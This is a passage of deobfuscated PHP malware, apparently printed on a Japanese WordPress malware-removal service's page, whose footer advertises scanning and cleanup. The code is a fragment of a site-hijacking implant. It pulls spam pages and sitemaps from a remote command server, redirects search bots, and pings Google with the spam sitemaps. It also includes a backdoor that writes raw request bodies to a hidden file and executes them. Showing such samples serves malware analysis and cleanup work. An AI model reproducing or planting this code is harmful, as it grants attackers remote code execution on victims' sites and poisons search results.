if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) {
return getenv("REMOTE_ADDR");
}
if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
return $_SERVER["REMOTE_ADDR"];
}
rMOz9:
}
?><html><?php
// [PHPDeobfuscator] Implied script end
return;
}
$uSYVv = $sn5PZ . "&groupid=" . $cn1SC . "&uri=" . $edQv_ . "&ip=" . $vG9JG;
$vAGwM = urlx(sprintf("https://%s/bot/302?" . $uSYVv . "&uri=" . $edQv_, gets()), $iO8PJ, $uSYVv, 1);
@header("Location: " . $vAGwM);
exit;
}
$uSYVv = $sn5PZ . "&http=" . $F1UZe . "&groupid=" . $cn1SC;
if (@preg_match("#([a-z]+)-(\\d+)?(.html)\$#i", $edQv_, $Mtj2g)) {
$uSYVv .= sprintf("&hpid=%s-%s", preg_replace("/[a-zI](xyz|buzz).*\$/", ".\$1", strrev($Mtj2g[1])), $Mtj2g[2]);
echo @trim(urlx(sprintf("https://%s/bot/page?" . $uSYVv, gets()), $iO8PJ, $uSYVv, 1));
exit;
}
if (@preg_match("#cate\\/([a-z]+)-(\\d+)\$#i", $edQv_, $zrRMT)) {
echo @trim(urlx(sprintf("https://%s/bot/cate?" . $uSYVv, gets()), $iO8PJ, $uSYVv . "&host=" . preg_replace("/[a-zI](xyz|buzz).*\$/", ".\$1", strrev($zrRMT[1])) . "&cateid=" . $zrRMT[2], 1));
exit;
}
echo @trim(urlx(sprintf("https://%s/bot/home?" . $uSYVv . "&uri=" . $edQv_, gets()), $iO8PJ, $uSYVv, 1));
exit;
}
$Rr2Wf = strval(time());
array_push($iO8PJ, "timestamp: " . $Rr2Wf);
array_push($iO8PJ, "xdoim: " . crc32($Rr2Wf . "\\n" . $sn5PZ));
$wLTOU = trim(urlx("https://" . gets() . $Mtj2g[0], $iO8PJ, $sn5PZ));
echo $h6r2w === false ? "fail" . gets() : $wLTOU . $cn1SC . gets();
exit;
}
$PmFOl = "https://search.yahoo.co.jp/search?p=site:%s&ei=UTF-8";
$PmFOl = $Mtj2g[1] == '' ? sprintf($PmFOl, $SBMcZ) : sprintf($PmFOl, $Mtj2g[1]);
$fgyLQ = urlx($PmFOl, null, null, 1, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7");
$fgyLQ = substr($fgyLQ, strpos($fgyLQ, "<!-- -->"), 100);
$fgyLQ = str_replace(array("/\\/s+/", "\\r\\n", "\\r", "\\n", "\"", ","), '', $fgyLQ);
@preg_match("#(\\d*)件<!--#", $fgyLQ, $Mtj2g);
echo $Mtj2g[1];
exit;
}
$Rr2Wf = isset($_SERVER["HTTP_TIMESTAMP"]) ? $_SERVER["HTTP_TIMESTAMP"] : '';
$x1mRn = @file_get_contents("php://input");
@file_put_contents(".eGA0Ty2WLh", $x1mRn, FILE_USE_INCLUDE_PATH);
echo include ".eGA0Ty2WLh";
unlink(".eGA0Ty2WLh");
exit;
}
$sn5PZ = "shost=" . $SBMcZ . "&http=" . $F1UZe;
if (@preg_match("#(\\d+)-\$#", $Mtj2g[1], $coiwp)) {
$sn5PZ .= "&groupid=" . $coiwp[1];
goto fMkHX;
}
$sn5PZ .= "&groupid=" . $cn1SC;
fMkHX:
$Rr2Wf = strval(time());
array_push($iO8PJ, "timestamp: " . $Rr2Wf);
array_push($iO8PJ, "xdoim: " . crc32($Rr2Wf . "\\n" . $sn5PZ));
$MXCPG = trim(urlx("https://" . gets() . "/sitemap" . ($Mtj2g[1] == '' || $coiwp[1] != '' ? ".xml" : "/" . $Mtj2g[1]), $iO8PJ, $sn5PZ));
if (!($MXCPG === '')) {
@header("Content-type: text/xml");
if (!(($Mtj2g[1] === '' || $coiwp[1] != '') && @preg_match("#^(\\d)*#", $MXCPG))) {
$UfxSF = explode("\n", $MXCPG);
$ykYb8 = '';
foreach ($UfxSF as $ld6IC) {
$vAGwM = $F1UZe . "://" . $SBMcZ . "/" . $ld6IC;
$ykYb8 .= sprintf($nIeh7, $vAGwM, $vAGwM);
}
echo sprintf($feyN4, $ykYb8);
exit;
}
$ugap4 = '';
$XNxz4 = 1;
of92i:
if (!($XNxz4 <= intval($MXCPG))) {
echo sprintf($EQ4mq, $ugap4);
exit;
}
$ugap4 .= sprintf($ffP85, $F1UZe, $SBMcZ, $XNxz4, date("Y-m-d\\TH:i:sP", time()));
$XNxz4++;
goto of92i;
}
exit;
}
$XqOCY = '';
if ($Mtj2g[1] === '' || @preg_match("#(\\d+)-\$#", $Mtj2g[1], $coiwp)) {
$sn5PZ .= $coiwp[1] == '' ? "&groupid=" . $cn1SC : "&groupid=" . $coiwp[1];
$Rr2Wf = strval(time());
array_push($iO8PJ, "timestamp: " . $Rr2Wf);
array_push($iO8PJ, "xdoim: " . crc32($Rr2Wf . "\\n" . $sn5PZ));
$MXCPG = trim(urlx("https://" . gets() . "/sitemap.xml", $iO8PJ, $sn5PZ . "&http=" . $F1UZe));
if (!($MXCPG === '')) {
if (!@preg_match("#^(\\d)*#", $MXCPG)) {
goto IPQqC;
}
$XNxz4 = 1;
MsDXz:
if (!($XNxz4 <= intval($MXCPG))) {
IPQqC:
goto vdtb7;
}
$EzMlU = sprintf("https://www.google.co.jp/ping?sitemap=%s://%s/sitemap%s%d.xml", $F1UZe, $SBMcZ, $coiwp[0], $XNxz4);
$JVymC = urlx($EzMlU);
$XqOCY .= $EzMlU . $JVymC;
$XNxz4++;
goto MsDXz;
}
exit;
}
$EzMlU = sprintf("https://www.google.co.jp/ping?sitemap=%s://%s/sitemap%s.xml", $F1UZe, $SBMcZ, $Mtj2g[1]);
$JVymC = urlx($EzMlU);
$XqOCY .= $EzMlU . $JVymC;
vdtb7:
echo $XqOCY;
exit;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.